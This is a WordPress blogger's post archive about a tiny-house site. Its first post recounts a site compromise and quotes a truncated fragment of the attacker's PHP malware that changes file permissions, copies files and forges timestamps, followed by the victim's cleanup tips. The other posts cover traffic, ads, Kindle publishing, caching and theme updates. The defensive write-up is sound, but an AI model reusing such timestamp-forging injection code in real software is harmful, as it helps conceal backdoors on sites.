Dang it! – JohnnyA got me again
This time he hit two of my minor blogs, that I didn’t harden as well as my big blogs. My bigger problem is that I don’t know how he got back in. I cracked his code and read through it carefully but still don’t know what it does entirely.
There are some troubling lines of code though. For example these few lines change file permissions and edit for immediate or later code insertions. Although he’s using 0644 and not 777 which would make files wide open to public read/write/execute, which is even more curious.
if (!is_writable($b6)) @chmod($b6, 0644);$b8 = @filemtime($b6);@copy($a6,$a6.’1.php’);@touch($b6,$b8,$b8);@touch($a6.’1.php’,$b8,$b8);
$d0 = rand_checkstr();$e1 = array(“((^index.*\.|^default.*\.|^main.*\.|^.*body.*\.|^login.*\.|^.*content.*\….
My guess is that his code infiltrates and copies itself or inserts more malware into existing files using normal hooks (like </body>, </head>, and </html>. This is normal stuff… but then it lies dormant until he runs another script that uses cross-site scripting. I suspect this is a classic Trojan script written in PHP, although I’m not a hacker so how would I know.
So it’s incredibly important to run some scans through your database , use PHPMyAdmin, search for eval( and $0=. Just be careful not to delete your whole database. That’s really easy to do it you’re not familiar with using PHPMyAdmin.
It might also be good to replace all your plugins and WordPress core files with fresh copies. Also be on the lookout for new files his script might be created as future-use backdoors. I’ve not found any of these yet but he seems like a really tricky bastard and that would be an obvious feature to add to his script.
Also be sure to change your blog and FTP passwords. I don’t think it’s unthinkable that JohnnyA has found a way to crack the WP password hash. This would be very difficult to do but he’s gotten so deep into my blogs’ core code that I think it’s good prevention to change your password.
Also check the file permission on your files via FTP and triple check your .htaccess file. I use WP-Super-Cache to rewrite the .htaccess file and help speed up performance.
There are some other plugins you can install like Exploit Scanner which seem to help you explore vulnerabilities. But I’ve not found any tool that words perfectly to block this JohnnyA.
50,613 Absolute Unique Visitors Today on Tiny House Design
What an amazing day on Tiny House Design today. Jay Shafer and his tiny house were featured on the Yahoo homepage and we got thousands of new visitors to our tiny house blogs. I had a record day eclipsing my previous record by a factor of five. I typically get about 50,000 unique visitors on Tiny House Design each month, so to get that much traffic in ONE DAY is really incredible.
My inbox is still crammed full of questions from new readers. The most common questions are:
- Where can a tiny house be parked?
- How much do they cost?
- How do I get started building one?
I’ll do some writing on these topics in the coming week to see if I can help shed some light on these popular topics.
Big thanks to Yahoo. It’s really wonderful to see this very important alternative housing topic covered so prominently. I also want to sincerely thank my friends Jay Shafer, and Steve Weissman over at the Tumbleweed Tiny House Company!
The Trouble with Monetizing a Green Blog with Advertising in Pale Shades of Green
One of the main methods green bloggers use to support themselves financially with their blogs is by working with advertising networks that sell ad space for them. Google AdSense is often the first choice by bloggers because their solution is so easy to implement. Virtually any blogger can sign-up and start earning money right away, including those with low traffic blogs. Google also does a reasonably good job of targeting relevant ads to the website content too. This is good for the advertiser, blogger, and reader because it keeps the paid content in context and improves the effectiveness of the advertising as well as the user experience.
Once a blog’s traffic increases to a certain level it becomes eligible for ad networks that pay per impression instead of per click like Google. Google limits you to three ad units per page. The benefit of adding another ad network is that you can theoretically double your ad revenue by doubling the number of ads on the page, as long as you don’t run into the downside of the law of diminishing returns by filling the page with ads.
I was running 7 ad spaces on TinyHouseDesign.com until today, but finally became dissatisfied with the pale green ads my second ad network was delivering. I also became very dissatisfied with their management when my sell-through rate dropped dramatically without any satisfactory explanation. I’ll keep one ad unit running in a prominent spot for a few months to see if this is just a temporary issue.
Catch-22 for Ad Networks
You see I think the main problem is that most of the advertising dollars out there right now are coming from large corporations that typically to focus on green-washing campaigns more than truly green endeavors. So ad networks are probably caught in a catch-22 just like most small businesses in America. They can either cling to their ethics and face ruin or accept a wider variety of advertising deals and survive.
Catch-22 for Bloggers
Green bloggers who rely on advertising revenue as their main source of income are also stuck in a hard spot. They can either choose to struggle and cut out these pale green ads or buck it up and let them continue running.
Thanks God for Day Jobs & Multiple Income Streams
Luckily for me I have a good day job. So instead of continuing to let these pale green ads run on TinyHouseDesign.com, I’ll refocus my attention on monetizing my site in other ways, like drawing more tiny house plans.
Basic Simplicity Theme version 1.4.1
This past week I finished an update to Basic Simplicity. I also launched a new blog dedicated to the theme to help focus on theme content. I’ll also be writing about my adventures in problogging with an emphasis on avoiding all the deep bullshit you’ll read about making money.
Don’t get me wrong, you can make money blogging, but it seems most of the probloggers are so focused on selling the idea of blogging to schemers that they often sound like schemers themselves with all their ebooks, mentorships, and classes. I have no plans to ‘make money’ writing about blogging; I’ll stick to selling something of real value, tiny house plans. So in other words… what I’ll have to say about blogging will be free.
So if you want a slightly different tone I hope you’ll follow me at BasicSimplicity.com. I also setup a Twitter account specifically for Basic Simplicity theme and blogging tweets @basicsimplicity.
How to publish your blog on the Amazon Kindle
I just finished submitting two of my busiest blogs to be published on the Amazon Kindle. It was really easy to do but there is no guarantee they will approve it. I’ll post here again and report back later on whether my blogs were approved or rejected. But in the mean time let me explain why and how to publish your blog(s) on Kindle.
Overview
What’s a Kindle? Amazon has developed a electronic tablet for reading electronic books.
A blog on Kindle? Amazon has opened Kindle up for reading blogs just like you would read an electronic book. Subscribers pay a monthly subscription fee to Amazon.
Why is there a subscription fee? There is no option to deliver the blog free on Kindle at this time. I guess Amazon is thinking that a small subscription fee is worth the convenience of reading blogs on Kindle.
Do I get paid? Blog publishers get 30% of the monthly subscription fee. The subscription rate pricing is determined by Amazon.
How To
Step 1. Create an Account: (Create your Kindle Publishing Account) You’ll need to provide your tax identification number (like Social Security Number), address, and answers to security questions like your mother’s maiden name, and other information just like you would for any affiliate account. This is not the same as your Amazon Associates account.
Step 2. Add a Blog: You’ll need to prepare the following graphic images and information before you’ll be able to complete their submission form:
Screenshot: This image must be 800×600 pixels or smaller and less than 1.0 MB. You must use GIF, JPEG, TIFF, or BMP.
Masthead: This image must be 430×50 pixels or smaller and less than 1.0 MB. You must use GIF, JPEG, TIFF, or BMP.
Blog Description: Write a concise description of your blog that surfaces the most popular features of your blog. I always refer to my Google Analytics account when trying to understand the most popular content on my blogs.
Keywords/Tags: They allow 128 characters worth of keywords/tags. Be sure to choose wisely because these are used when people search for Kindle content.
RSS Feed URL: I submitted my original WordPress generated RSS URL. I didn’t want my Kindle account to rely on my Feedburner RSS URL. If you don’t know what your RSS URL is just view source and look for a line of code that looks like this:
<link rel=”alternate” type=”application/rss+xml” title=”Tiny House Design RSS Feed” href=”http://www.tinyhousedesign.com/feed/” />
The RSS URL in this example is: http://www.tinyhousedesign.com/feed/
Submission Form: Here is a screenshot of their submission form. Just click the thumbnail to see the full size image.
Step 3. Wait for Approval: It takes up to 72 hours for Amazon to approve or reject your submission.
Conclusion
This seems like a really interesting way to monetize and promote a blog. I think it’s still too early to know if Kindle will be a big hit like the iPhone but it does make sense to jump in early and get your blog on Kindle. It takes little time and costs no money and has great potential.
The newest Kindle seems like a really nifty device. I like it mostly because it would make it easy to downsize the bulk of a library and reduce the number of possessions we own. As a simple living advocate and anti-consumerist it’s a little ironic that I’d actually see value in any consumer product but this one would actually reduce the books your have to store.
Create your Kindle Publishing Account
Update! Both blogs I submitted were approved and are now available on Amazon Kindle. Take a look:
WP Super Cache Lowers My Hosting Cost
A couple of weeks ago I began re-testing a popular WordPress plugin called WP Super Cache. I had tried it before but had installed it incorrectly and crashed my biggest blog. This time I installed it right and it works great. It works by making flat HTML files of your blog’s web pages and moves the traffic load to Apache (the web server software) and off MySQL (the database software).
The benefit of this is that Apache can take the load and MySQL burns up the servers processor, relatively speaking. My host, Media Temple, charges more money when you use more than your fair share of your shared server’s processor. This seems fair and I like Media Temple because their system can auto scale-up to take huge traffic days, and I’ve had several on Tiny House Design.
My testing has shown that WP Super Cache does reduce my cost because it lightens the load on MySQL. It also speeds up my page loads because Apache is incredibly efficient at serving up flat HTML pages and images.
So I highly recommend WP Super Cache but will also warn you to be sure to read all the installation documentation and learn how to back it out if you experience a crash.
Here are screenshots from my GPU usage (processor use) at Media Temple and Google Analytics during the same time period. As you can see traffic was flat and GPU usage remained low.
Above: Control panel on Media Temple that shows low GPU usage.
Below: Report on Google Analytics.
Basic Simplicity 1.3 (new version of my WordPress theme)
I submitted my minimalist WordPress theme to the Free Theme Directory the other day and got a note back from them with a few suggestions. It didn’t take long to implement their recommended improvements and now Basic Simplicity 1.3 is available.
[download id="1"]
Updated WordPress Theme – Basic Simplicity Version 1.2
Over the last few nights I whipped up a simple administration screen for my free WordPress Theme. Now you can make very quick style changes right in the WordPress user interface; there’s no need to edit the stylesheet. You can also add your Google Analytics code, Google site verification code, and custom CSS.
These will be the last few edits for a while; I think I have it working well enough to start using basic simplicity on all my blogs. I have a few more features I’d like to add but I’ll hold off and give this version a careful test drive. If you give it a try too and run across any bugs please let me know. If you have any suggestions for future versions I’m all ears as well.
Basic Simplicity WordPress Theme Updates
I just uploaded the next version of basic simplicity, the WordPress theme I created. The biggest changes are the addition of four more widget areas (for a total of 10) to make it easy to add advertising to the top right and bottom of posts and pages.
I also added a mini-stylesheet to the bottom of the main stylesheet. This is bound to cause a little confusion so in the next iteration I’ll create a theme admin screen to allow quick color and style edits right in the WordPress interface.
Complete Redesign Of Tiny House Design User Interface
It’s midnight and I think I’m done reworking the UI of tiny house design. My main concern wasn’t the look & feel but the navigation. One of the biggest problems with a blog, by nature, is it’s ability to hide away old content. But the beauty of the WordPress CMS (and I think it deserves to be called that) is it’s flexibility. Anyway take a look.
